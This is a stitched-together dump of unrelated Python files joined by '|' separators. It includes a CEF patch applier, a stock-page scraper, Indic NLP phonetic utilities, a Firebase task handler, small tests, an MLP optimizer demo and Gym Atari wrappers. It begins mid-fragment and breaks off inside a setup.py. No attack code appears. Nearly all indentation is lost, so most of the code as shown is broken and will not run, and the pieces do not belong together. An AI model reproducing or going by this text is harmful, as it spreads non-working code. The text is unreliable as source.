self.harvestorQ.clear()
for i in chk:
self.harvestorQ.append(i[1])
|
# Copyright (c) 2009 The Chromium Embedded Framework Authors. All rights
# reserved. Use of this source code is governed by a BSD-style license that
# can be found in the LICENSE file.
from __future__ import absolute_import
import pickle
from optparse import OptionParser
import os
import sys
from file_util import *
from git_util import git_apply_patch_file
# Cannot be loaded as a module.
if __name__ != "__main__":
sys.stdout.write('This file cannot be loaded as a module!')
sys.exit()
# The CEF root directory is the parent directory of _this_ script.
cef_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
cef_patch_dir = os.path.join(cef_dir, 'patch')
src_dir = os.path.abspath(os.path.join(cef_dir, os.pardir))
def write_note(type, note):
separator = '-' * 79 + '\n'
sys.stdout.write(separator)
sys.stdout.write('!!!! %s: %s\n' % (type, note))
sys.stdout.write(separator)
def apply_patch_file(patch_file, patch_dir):
''' Apply a specific patch file in optional patch directory. '''
patch_path = os.path.join(cef_patch_dir, 'patches', patch_file + '.patch')
if patch_dir is None or len(patch_dir) == 0:
patch_dir = src_dir
else:
if not os.path.isabs(patch_dir):
# Apply patch relative to the Chromium 'src' directory.
patch_dir = os.path.join(src_dir, patch_dir)
patch_dir = os.path.abspath(patch_dir)
result = git_apply_patch_file(patch_path, patch_dir)
if result == 'fail':
write_note('ERROR',
'This patch failed to apply. Your build will not be correct.')
return result
def apply_patch_config():
''' Apply patch files based on a configuration file. '''
config_file = os.path.join(cef_patch_dir, 'patch.cfg')
if not os.path.isfile(config_file):
raise Exception('Patch config file %s does not exist.' % config_file)
# Parse the configuration file.
scope = {}
exec (compile(open(config_file, "rb").read(), config_file, 'exec'), scope)
patches = scope["patches"]
results = {'apply': 0, 'skip': 0, 'fail': 0}
for patch in patches:
patch_file = patch['name']
dopatch = True
if 'condition' in patch:
# Check that the environment variable is set.
if patch['condition'] not in os.environ:
sys.stdout.write('\nSkipping patch file %s\n' % patch_file)
dopatch = False
if dopatch:
result = apply_patch_file(patch_file, patch['path']
if 'path' in patch else None)
results[result] += 1
if 'note' in patch:
write_note('NOTE', patch['note'])
else:
results['skip'] += 1
sys.stdout.write('\n%d patches total (%d applied, %d skipped, %d failed)\n' % \
(len(patches), results['apply'], results['skip'], results['fail']))
if results['fail'] > 0:
sys.stdout.write('\n')
write_note('ERROR',
'%d patches failed to apply. Your build will not be correct.' %
results['fail'])
sys.exit(1)
# Parse command-line options.
disc = """
This utility applies patch files.
"""
parser = OptionParser(description=disc)
parser.add_option(
'--patch-file', dest='patchfile', metavar='FILE', help='patch source file')
parser.add_option(
'--patch-dir',
dest='patchdir',
metavar='DIR',
help='patch target directory')
(options, args) = parser.parse_args()
if options.patchfile is not None:
apply_patch_file(options.patchfile, options.patchdir)
else:
apply_patch_config()
|
#!/usr/bin/python
import urllib2
import os
import sys
import time
from bs4 import BeautifulSoup
os.chdir('/home/yiwen/stockStrategies/addition')
def getRawContent(code,s=0):
t=60
while True:
try:
response=urllib2.urlopen('http://stockpage.10jqka.com.cn/%s/bonus/#additionprofile'%(code.strip()[2:]))
content=response.read()
soup=BeautifulSoup(content)
if soup.find('div',attrs={'class':'m_header'}) is not None:
return soup
except:
pass
time.sleep(t)
t+=60
def getAdditionProfile(content):
return content.find(attrs={'id':'additionprofile','class':'bd'})
def getConclusion(part):
return ''.join([s.strip().encode('utf8','ignore') for s in part.div.get_text().splitlines()])
def parseUnit(s):
if s.strip()=='--':
return 'NULL'
ssplits=s.strip().split(' ')
if len(ssplits)>3:
print 'Error:'+s.encode('utf8')
#sys.exit(1)
try:
tmp=str(float(ssplits[0]))
return tmp
except:
return 'NULL'
if len(ssplits)==1:
return "'"+s+"'"
if len(ssplits)==2:
if ssplits[1].find(u'\u4ebf')==0:
return str(float(ssplits[0])*100000000)
elif ssplits[1].find(u'\u4e07')==0:
return str(float(ssplits[0])*10000)
elif len(ssplits[1])==1:
return str(ssplits[0])
else:
print 'Error:'+s.encode('utf8')
sys.exit(1)
if len(ssplits)==3:
if ssplits[2].find(u'\u4ebf')==0:
return str(float(ssplits[1])*100000000)
elif ssplits[2].find(u'\u4e07')==0:
return str(float(ssplits[1])*10000)
elif len(ssplits[2])==1:
return str(ssplits[1])
else:
print 'Error:'+s.encode('utf8')
sys.exit(1)
def getFulltable(part):
i=0
data=[]
for s in part.stripped_strings:
if not s.strip()==u'\uff1a':
i+=1
if i%2==0:
data.append(parseUnit(s))
return data
if __name__=='__main__':
if len(sys.argv)<2:
print 'Usage:COMMAND <output>'
sys.exit(1)
if os.path.exists(sys.argv[1]):
print '%s file exists'%sys.argv[1]
sys.exit(1)
input=file('todo.list')
output=file(sys.argv[1],'w')
data4write=[]
while True:
data=input.readline()
if len(data)==0:
break
code=data.strip()[2:]
print code
sys.stdout.flush()
time.sleep(3)
soup=getRawContent(data)
targetDiv=getAdditionProfile(soup)
if targetDiv is not None:
tables=targetDiv.find_all('table',recursive=False)
for subtable in tables:
results=getFulltable(subtable)
try:
data4write.append('('+str(code)+','+','.join(results).encode('utf8','ignore')+')')
except:
pass
for i in range(0,len(data4write)):
if i<(len(data4write)-1):
output.write(data4write[i]+',\n')
else:
output.write(data4write[i]+';\n')
output.close()
|
#
# Copyright (c) 2013-present, Anoop Kunchukuttan
# All rights reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import pandas as pd
import numpy as np
import os
from indicnlp import common
from indicnlp.common import IndicNlpException
from indicnlp import langinfo as li
###
# Phonetic Information about script characters
###
""" Phonetic data about all languages except Tamil """
ALL_PHONETIC_DATA=None
""" Phonetic data for Tamil """
TAMIL_PHONETIC_DATA=None
""" Phonetic vector for all languages except Tamil """
ALL_PHONETIC_VECTORS=None
""" Phonetic vector for Tamil """
TAMIL_PHONETIC_VECTORS=None
""" Length of phonetic vector """
PHONETIC_VECTOR_LENGTH=38
""" Start offset for the phonetic feature vector in the phonetic data vector """
PHONETIC_VECTOR_START_OFFSET=6
## PHONETIC PROPERTIES in order in which they occur in the vector
## This list must be in sync with the keys in the PV_PROP_RANGES dictionary
PV_PROP=['basic_type',
'vowel_length',
'vowel_strength',
'vowel_status',
'consonant_type',
'articulation_place',
'aspiration',
'voicing',
'nasalization',
'vowel_horizontal',
'vowel_vertical',
'vowel_roundness',
]
###
# Bit vector ranges for various properties
###
PV_PROP_RANGES={
'basic_type': [0,6],
'vowel_length': [6,8],
'vowel_strength': [8,11],
'vowel_status': [11,13],
'consonant_type': [13,18],
'articulation_place': [18,23],
'aspiration': [23,25],
'voicing': [25,27],
'nasalization': [27,29],
'vowel_horizontal': [29,32],
'vowel_vertical': [32,36],
'vowel_roundness': [36,38],
}
####
# Indexes into the Phonetic Vector
####
PVIDX_BT_VOWEL=0
PVIDX_BT_CONSONANT=1
PVIDX_BT_NUKTA=2
PVIDX_BT_HALANT=3
PVIDX_BT_ANUSVAAR=4
PVIDX_BT_MISC=5
PVIDX_BT_S=PVIDX_BT_VOWEL
PVIDX_BT_E=PVIDX_BT_MISC+1
PVIDX_VSTAT_DEP=12
#####
# Unicode information about characters
#####
SCRIPT_OFFSET_START=0
SCRIPT_OFFSET_RANGE=0x80
def init():
"""
To be called by library loader, do not call it in your program
"""
global ALL_PHONETIC_DATA, ALL_PHONETIC_VECTORS, TAMIL_PHONETIC_DATA, TAMIL_PHONETIC_VECTORS, PHONETIC_VECTOR_LENGTH, PHONETIC_VECTOR_START_OFFSET
ALL_PHONETIC_DATA=pd.read_csv(os.path.join(common.get_resources_path(),'script','all_script_phonetic_data.csv'),encoding='utf-8')
TAMIL_PHONETIC_DATA=pd.read_csv(os.path.join(common.get_resources_path(),'script','tamil_script_phonetic_data.csv'),encoding='utf-8')
ALL_PHONETIC_VECTORS= ALL_PHONETIC_DATA.iloc[:,PHONETIC_VECTOR_START_OFFSET:].values
TAMIL_PHONETIC_VECTORS=TAMIL_PHONETIC_DATA.iloc[:,PHONETIC_VECTOR_START_OFFSET:].values
PHONETIC_VECTOR_LENGTH=ALL_PHONETIC_VECTORS.shape[1]
def is_supported_language(lang):
return lang in list(li.SCRIPT_RANGES.keys())
def get_offset(c,lang):
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
return ord(c)-li.SCRIPT_RANGES[lang][0]
def offset_to_char(off,lang):
"""
Applicable to Brahmi derived Indic scripts
"""
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
return chr(off+li.SCRIPT_RANGES[lang][0])
def is_indiclang_char(c,lang):
"""
Applicable to Brahmi derived Indic scripts
Note that DANDA and DOUBLE_DANDA have the same Unicode codepoint for all Indic scripts
"""
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
o=get_offset(c,lang)
return (o>=SCRIPT_OFFSET_START and o<SCRIPT_OFFSET_RANGE) \
or ord(c)==li.DANDA or ord(c)==li.DOUBLE_DANDA
def in_coordinated_range_offset(c_offset):
"""
Applicable to Brahmi derived Indic scripts
"""
return (c_offset>=li.COORDINATED_RANGE_START_INCLUSIVE and c_offset<=li.COORDINATED_RANGE_END_INCLUSIVE)
def in_coordinated_range(c,lang):
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
return in_coordinated_range_offset(get_offset(c,lang))
def get_phonetic_info(lang):
if not is_supported_language(lang):
raise IndicNlpException('Language {} not supported'.format(lang))
phonetic_data= ALL_PHONETIC_DATA if lang!=li.LC_TA else TAMIL_PHONETIC_DATA
phonetic_vectors= ALL_PHONETIC_VECTORS if lang!=li.LC_TA else TAMIL_PHONETIC_VECTORS
return (phonetic_data, phonetic_vectors)
def invalid_vector():
## TODO: check if np datatype is correct?
return np.array([0]*PHONETIC_VECTOR_LENGTH)
def get_phonetic_feature_vector(c,lang):
offset=get_offset(c,lang)
if not in_coordinated_range_offset(offset):
return invalid_vector()
phonetic_data, phonetic_vectors= get_phonetic_info(lang)
    if phonetic_data.loc[offset,'Valid Vector Representation']==0:
return invalid_vector()
return phonetic_vectors[offset]
def get_phonetic_feature_vector_offset(offset,lang):
if not in_coordinated_range_offset(offset):
return invalid_vector()
phonetic_data, phonetic_vectors= get_phonetic_info(lang)
    if phonetic_data.loc[offset,'Valid Vector Representation']==0:
return invalid_vector()
return phonetic_vectors[offset]
### Unary operations on vectors
def is_valid(v):
return np.sum(v)>0
def is_vowel(v):
return v[PVIDX_BT_VOWEL]==1
def is_consonant(v):
return v[PVIDX_BT_CONSONANT]==1
def is_halant(v):
return v[PVIDX_BT_HALANT]==1
def is_nukta(v):
return v[PVIDX_BT_NUKTA]==1
def is_anusvaar(v):
return v[PVIDX_BT_ANUSVAAR]==1
def is_misc(v):
return v[PVIDX_BT_MISC]==1
def is_dependent_vowel(v):
return is_vowel(v) and v[PVIDX_VSTAT_DEP]==1
def is_plosive(v):
return is_consonant(v) and get_property_vector(v,'consonant_type')[0]==1
### Binary operations on phonetic vectors
def or_vectors(v1,v2):
return np.array([ 1 if (b1+b2)>=1 else 0 for b1,b2 in zip(v1,v2) ])
def xor_vectors(v1,v2):
return np.array([ 1 if b1!=b2 else 0 for b1,b2 in zip(v1,v2) ])
### Getting properties from phonetic vectors
def get_property_vector(v,prop_name):
return v[PV_PROP_RANGES[prop_name][0]:PV_PROP_RANGES[prop_name][1]]
def get_property_value(v,prop_name):
factor_bits=get_property_vector(v,prop_name).tolist()
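    # Interpret the property's bit slice as a binary number with the first bit
    # most significant, e.g. [0, 1, 1] -> 0*4 + 1*2 + 1*1 = 3.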
v=0
c=1
for b in factor_bits[::-1]:
v+=(c*b)
c=c*2.0
return int(v)
def lcsr_indic(srcw,tgtw,slang,tlang):
"""
compute the Longest Common Subsequence Ratio (LCSR) between two strings at the character level.
This works for Indic scripts by mapping both languages to a common script
srcw: source language string
    tgtw: target language string
slang: source language
tlang: target language
"""
score_mat=np.zeros((len(srcw)+1,len(tgtw)+1))
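    # score_mat[si, ti] holds the LCS length of srcw[:si] and tgtw[:ti]; two
    # characters match when they map to the same coordinated offset, or when
    # neither lies in the coordinated range and they are literally equal.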
for si,sc in enumerate(srcw,1):
for ti,tc in enumerate(tgtw,1):
so=get_offset(sc,slang)
to=get_offset(tc,tlang)
if in_coordinated_range_offset(so) and in_coordinated_range_offset(to) and so==to:
score_mat[si,ti]=score_mat[si-1,ti-1]+1.0
elif not (in_coordinated_range_offset(so) or in_coordinated_range_offset(to)) and sc==tc:
score_mat[si,ti]=score_mat[si-1,ti-1]+1.0
else:
score_mat[si,ti]= max(
score_mat[si,ti-1],
score_mat[si-1,ti])
return (score_mat[-1,-1]/float(max(len(srcw),len(tgtw))),float(len(srcw)),float(len(tgtw)))
def lcsr_any(srcw,tgtw):
"""
LCSR computation if both languages have the same script
"""
score_mat=np.zeros((len(srcw)+1,len(tgtw)+1))
for si,sc in enumerate(srcw,1):
for ti,tc in enumerate(tgtw,1):
if sc==tc:
score_mat[si,ti]=score_mat[si-1,ti-1]+1.0
else:
score_mat[si,ti]= max(
score_mat[si,ti-1],
score_mat[si-1,ti])
return (score_mat[-1,-1]/float(max(len(srcw),len(tgtw))),float(len(srcw)),float(len(tgtw)))
def lcsr(srcw,tgtw,slang,tlang):
"""
compute the Longest Common Subsequence Ratio (LCSR) between two strings at the character level.
srcw: source language string
    tgtw: target language string
slang: source language
tlang: target language
"""
if slang==tlang or not is_supported_language(slang) or not is_supported_language(tlang):
        return lcsr_any(srcw,tgtw)
else:
        return lcsr_indic(srcw,tgtw,slang,tlang)
|
import endpoints
import logging
import uuid
import urllib
import json
from httplib2 import Http
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
from protorpc import remote
from protorpc import message_types
from google.appengine.datastore.datastore_query import Cursor
from oauth2client.contrib.appengine import AppAssertionCredentials
from oauth2client.client import GoogleCredentials
from protorpc import remote
from google.appengine.api import taskqueue
from apps.handlers import BaseHandler
from apps.metagame.controllers.factions import FactionsController
from apps.metagame.controllers.zones import ZonesController
from configuration import *
_FIREBASE_SCOPES = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email']
class FactionUpdateFirebaseHandler(BaseHandler):
def post(self):
logging.info("[TASK] FactionUpdateFirebaseHandler")
key_id = self.request.get('key_id')
faction = FactionsController().get_by_key_id(int(key_id))
if not faction:
logging.error('faction not found')
return
## get the zones that this faction currently controls?
## link back to the region/map in html
zoneController = ZonesController()
zones_json = []
zones = zoneController.list_by_factionKeyId(faction.key.id())
for zone in zones:
zones_json.append(zone.to_json())
faction.zones = zones_json
faction_json = json.dumps(faction.to_json_with_zones() )
credentials = GoogleCredentials.get_application_default().create_scoped(_FIREBASE_SCOPES)
http_auth = credentials.authorize(Http())
headers = {"Content-Type": "application/json"}
URL = "%s/factions/%s.json" % (FIREBASE_DATABASE_ROOT, faction.key.id())
resp, content = http_auth.request(URL,
"PUT",
##"PUT", ## Write or replace data to a defined path,
faction_json,
headers=headers)
logging.info(resp)
logging.info(content)
|
import re
def sanitize(text, patterns_replacements):
"""Arg patterns_replacements is a list of tuples (regex pattern, string to replace the match with)"""
try:
text = text.strip()
for rep in patterns_replacements:
text = re.sub(rep[0], rep[1], text)
return ' '.join(text.split())
except (AttributeError, KeyError):
return ''
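# Illustrative usage (hypothetical patterns): strip HTML tags and mask digits
# before whitespace is collapsed.
#   sanitize(' Price: <b>100</b> USD ', [(r'<[^>]+>', ''), (r'\d+', 'N')])
#   returns 'Price: N USD'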
|
import pytest
def test_get_blocks_nonexistent(parser):
result = parser.get_blocks(dict())
assert result == False
def test_get_blocks_empty(parser, empty_sb3):
result = parser.get_blocks(empty_sb3)
assert type(result) == dict
assert len(result) == 0
assert result == {}
def test_get_blocks_full(parser, full_sb3):
result = parser.get_blocks(full_sb3)
assert type(result) == dict
assert len(result) == 20
lengths = {
"event_whenflagclicked": 1,
"control_wait": 1,
"control_repeat": 1,
"motion_movesteps": 1,
"motion_ifonedgebounce": 1,
"event_broadcast": 1,
"data_showvariable": 1,
"looks_nextcostume": 1,
"looks_sayforsecs": 1,
"event_whenbroadcastreceived": 1,
"sound_changevolumeby": 1,
"procedures_call": 1,
"procedures_definition": 1,
"sensing_askandwait": 1,
"control_if": 1,
"operator_gt": 1,
"sensing_answer": 1,
"data_setvariableto": 1,
"operator_random": 1,
"sound_playuntildone": 1
}
for block in result:
assert len(result[block]) == lengths[block]
def test_get_blocks_no_orphans(parser, orphans_sb3):
result = parser.get_blocks(orphans_sb3, False)
assert type(result) == dict
assert len(result) == 2
def test_get_blocks_orphans(parser, orphans_sb3):
result = parser.get_blocks(orphans_sb3)
assert type(result) == dict
assert len(result) == 6
|
import unittest
import arff
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
OBJ = {
'description': '\nXOR Dataset\n\n\n',
'relation': 'XOR',
'attributes': [
('input1', 'REAL'),
('input2', 'REAL'),
('y', 'REAL'),
],
'data': [
[0.0, 0.0, 0.0],
[0.0, 1.0, 1.0],
[1.0, 0.0, 1.0],
[1.0, 1.0, 0.0]
]
}
ARFF = '''%
% XOR Dataset
%
%
@RELATION XOR
@ATTRIBUTE input1 REAL
@ATTRIBUTE input2 REAL
@ATTRIBUTE y REAL
@DATA
0.0,0.0,0.0
0.0,1.0,1.0
1.0,0.0,1.0
1.0,1.0,0.0
'''
class TestLoadDump(unittest.TestCase):
def get_dumps(self):
dumps = arff.dumps
return dumps
def get_loads(self):
loads = arff.loads
return loads
def test_simple(self):
dumps = self.get_dumps()
loads = self.get_loads()
arff = ARFF
obj = None
count = 0
while count < 10:
count += 1
obj = loads(arff)
arff = dumps(obj)
self.assertEqual(arff, ARFF)
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
@author: avaldes
"""
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from mlp import MLP
nb_black = 50
nb_red = 50
nb_green = 50
nb_data = nb_black + nb_red + nb_green
s = np.linspace(0, 2*np.pi, nb_black)
x_black = np.vstack([np.cos(s), np.sin(s)]).T
x_red = 2 * np.vstack([np.cos(s), np.sin(s)]).T
x_green = 3 * np.vstack([np.cos(s), np.sin(s)]).T
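# The three classes are concentric rings of radius 1, 2 and 3, so the decision
# regions the network has to learn are circular bands.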
x_data = np.vstack((x_black, x_red, x_green))
t_list = [1, 0, 0] * nb_black + [0, 1, 0] * nb_red + [0, 0, 1] * nb_green
t_data = np.asarray(t_list).reshape(nb_data, 3)
D = x_data.shape[1]
K = 3
K_list = [D, 100, 50, K]
activation_functions = [MLP.relu] * 2 + [MLP.softmax]
diff_activation_functions = [MLP.drelu] * 2
methods = ['SGD', 'momentum', 'nesterov', 'adagrad',
'adadelta', 'RMS_prop', 'adam']
fig, ax = plt.subplots(2, 4)
list_pairs = [(r, c) for r in range(2) for c in range(4)]
for counter, method in enumerate(methods):
method = methods[counter]
mlp = MLP(K_list,
activation_functions,
diff_activation_functions,
init_seed=5)
mlp.train(x_data, t_data,
epochs=200, batch_size=20,
eta=0.01,
method=method,
print_cost=True,
initialize_weights=True)
delta = 0.05
a, b = -4, 4
x = np.arange(a, b, delta)
y = np.arange(a, b, delta)
X, Y = np.meshgrid(x, y)
x_pts = np.vstack((X.flatten(), Y.flatten())).T
mlp.get_activations_and_units(x_pts)
grid_size = X.shape[0]
print(method)
r, c = list_pairs[counter]
curr_axes = ax[r, c]
curr_axes.axis('equal')
curr_axes.scatter(X, Y, facecolors=mlp.y)
curr_axes.scatter(x_data[:, 0], x_data[:, 1],
marker='o',
s=1,
color='black')
curr_axes.set_xlim(-4, 4)
curr_axes.set_ylim(-4, 4)
curr_axes.set_title(method)
mlp.get_activations_and_units(x_data)
error = mlp.softmax_cross_entropy(mlp.y, t_data)
curr_axes.set_xlabel('error= %.3f' % error)
plt.show()
|
from collections import deque
import gym
import numpy as np
from gym import spaces
from PIL import Image
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset()
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(
1, self.noop_max + 1) # pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(0)
if done:
obs = self.env.reset()
return obs
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self):
self.env.reset()
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset()
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset()
return obs
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
            # for Qbert sometimes we stay in lives == 0 condition for a few frames
            # so it's important to keep lives > 0, so that we only reset once
            # the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset()
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
last_info = {}
done = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
total_reward += reward
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
if done:
break
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, total_reward, done, last_info
def reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class MaxEnv(gym.Wrapper):
def __init__(self, env, skip=4):
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = deque(maxlen=2)
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
obs, reward, done, info = self.env.step(action)
self._obs_buffer.append(obs)
max_frame = np.max(np.stack(self._obs_buffer), axis=0)
return max_frame, reward, done, info
def reset(self):
"""Clear past frame buffer and init. to first obs. from inner env."""
self._obs_buffer.clear()
obs = self.env.reset()
self._obs_buffer.append(obs)
return obs
class SkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
self._skip = skip
def step(self, action):
total_reward = 0.0
last_info = {}
done = None
obs = None
for _ in range(self._skip):
obs, reward, done, info = self.env.step(action)
total_reward += reward
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
if done:
break
return obs, total_reward, done, last_info
class ClipRewardEnv(gym.RewardWrapper):
def _reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
gym.ObservationWrapper.__init__(self, env)
self.res = 84
self.observation_space = spaces.Box(
low=0, high=255, shape=(self.res, self.res, 1))
def _observation(self, obs):
frame = np.dot(obs.astype('float32'), np.array(
[0.299, 0.587, 0.114], 'float32'))
frame = np.array(Image.fromarray(frame).resize((self.res, self.res),
resample=Image.BILINEAR), dtype=np.uint8)
return frame.reshape((self.res, self.res, 1))
class FrameStack(gym.Wrapper):
default_k = 3
def __init__(self, env, k=None):
"""Buffer observations and stack across channels (last axis)."""
gym.Wrapper.__init__(self, env)
if k is None:
k = FrameStack.default_k
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
# assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = spaces.Box(
low=0, high=255, shape=(shp[0], shp[1], k * shp[2]))
def reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._observation()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._observation(), reward, done, info
def _observation(self):
assert len(self.frames) == self.k
obs = np.concatenate(self.frames, axis=2)
assert list(np.shape(obs)) == list(self.observation_space.shape)
return obs
class SkipAndFrameStack(gym.Wrapper):
def __init__(self, env, skip=4, k=4):
"""Equivalent to SkipEnv(FrameStack(env, k), skip) but more efficient"""
gym.Wrapper.__init__(self, env)
self.k = k
self._skip = skip
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
assert shp[2] == 1 # can only stack 1-channel frames
self.observation_space = spaces.Box(
low=0, high=255, shape=(shp[0], shp[1], k))
def reset(self):
"""Clear buffer and re-fill by duplicating the first observation."""
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._observation()
def step(self, action):
total_reward = 0.0
last_info = {}
done = None
for _ in range(self._skip):
ob, reward, done, info = self.env.step(action)
total_reward += reward
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
self.frames.append(ob)
if done:
break
return self._observation(), total_reward, done, last_info
def _observation(self):
assert len(self.frames) == self.k
return np.concatenate(self.frames, axis=2)
class ObsExpandWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
low = env.observation_space.low
high = env.observation_space.high
low = low if np.isscalar(low) else np.asarray(low).item(0)
high = high if np.isscalar(high) else np.asarray(high).item(0)
shape = (
    env.observation_space.shape[0],
    env.observation_space.shape[1] if len(env.observation_space.shape) >= 2 else 1,
    env.observation_space.shape[2] if len(env.observation_space.shape) >= 3 else 1,
)
self.observation_space = gym.spaces.Box(low, high, shape=shape)
def reset(self):
ob = super().reset()
if ob.ndim == 1:
ob = ob[:, np.newaxis, np.newaxis]
elif ob.ndim == 2:
ob = ob[:, :, np.newaxis]
return ob
def step(self, action):
ob, r, d, info = super().step(action)
if ob.ndim == 1:
ob = ob[:, np.newaxis, np.newaxis]
elif ob.ndim == 2:
ob = ob[:, :, np.newaxis]
return ob, r, d, info
class NoopFrameskipWrapper(gym.Wrapper):
def __init__(self, env, gamma=0.99):
super().__init__(env)
self.FRAMESKIP_ON_NOOP = 2
self.gamma = gamma
self.noop_phase = False
self.skipped_already = 0
def _is_noop(self, action):
return action == 0
def step(self, action):
if self._is_noop(action):
R = 0
last_info = {}
ob = None
d = False
for i in range(self.FRAMESKIP_ON_NOOP):
ob, r, d, info = super().step(action)
R += r
for key in info.keys():
if 'reward' in key.lower():
info[key] = info[key] + last_info.get(key, 0)
last_info = info
if d:
break
return ob, R, d, last_info
else:
return super().step(action)
class BreakoutContinuousActionWrapper(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.action_space = spaces.Box(-1, 1, shape=[1])
def step(self, action):
if action < -1 / 3:
action = 3
elif action >= -1 / 3 and action <= 1 / 3:
action = 0
else:
action = 2
return self.env.step(action)
def wrap_deepmind(env, episode_life=True, clip_rewards=True):
"""Configure environment for DeepMind-style Atari.
Note: this does not include frame stacking!"""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
return env
def wrap_deepmind_with_framestack(env, episode_life=True, clip_rewards=True, framestack_k=4, frameskip_k=4, noop_max=30):
"""Configure environment for DeepMind-style Atari."""
assert 'NoFrameskip' in env.spec.id # required for DeepMind-style skip
if episode_life:
env = EpisodicLifeEnv(env)
env = NoopResetEnv(env, noop_max=noop_max)
env = MaxAndSkipEnv(env, skip=frameskip_k)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
env = FrameStack(env, k=framestack_k)
return env
wrap_atari = wrap_deepmind_with_framestack
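# Minimal usage sketch (not part of the original module): assumes gym's Atari
# dependencies and ROMs are installed; 'BreakoutNoFrameskip-v4' is only an
# example id and may differ between gym versions.
if __name__ == '__main__':
    demo_env = gym.make('BreakoutNoFrameskip-v4')
    demo_env = wrap_deepmind_with_framestack(demo_env, framestack_k=4, frameskip_k=4)
    first_obs = demo_env.reset()
    # WarpFrame yields 84x84x1 grayscale frames and FrameStack concatenates k of them.
    print('stacked observation shape:', first_obs.shape)  # expected (84, 84, 4)
    demo_env.close()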
|
#!/usr/bin/env python
import sys
from setuptools import setup, find_packages, Extension
from distutils import ccompiler
VERSION = (0, 0, 1)
VERSION_STR = ".".join([str(x) for x in VERSION])
EXTRA_OPT = 0
if "--extra-optimization" in sys.argv:
# Enable extra compiler optimizations
EXTRA_OPT = 1
sys.argv.remove("--extra-optimization")
if ccompiler.get_default_compiler() == "msvc":
extra_compile_args = ["/Wall"]
if EXTRA_OPT:
extra_compile_args.insert(0, "/O2")
else:
extra_compile_args.insert(0, "/Ot")
else:
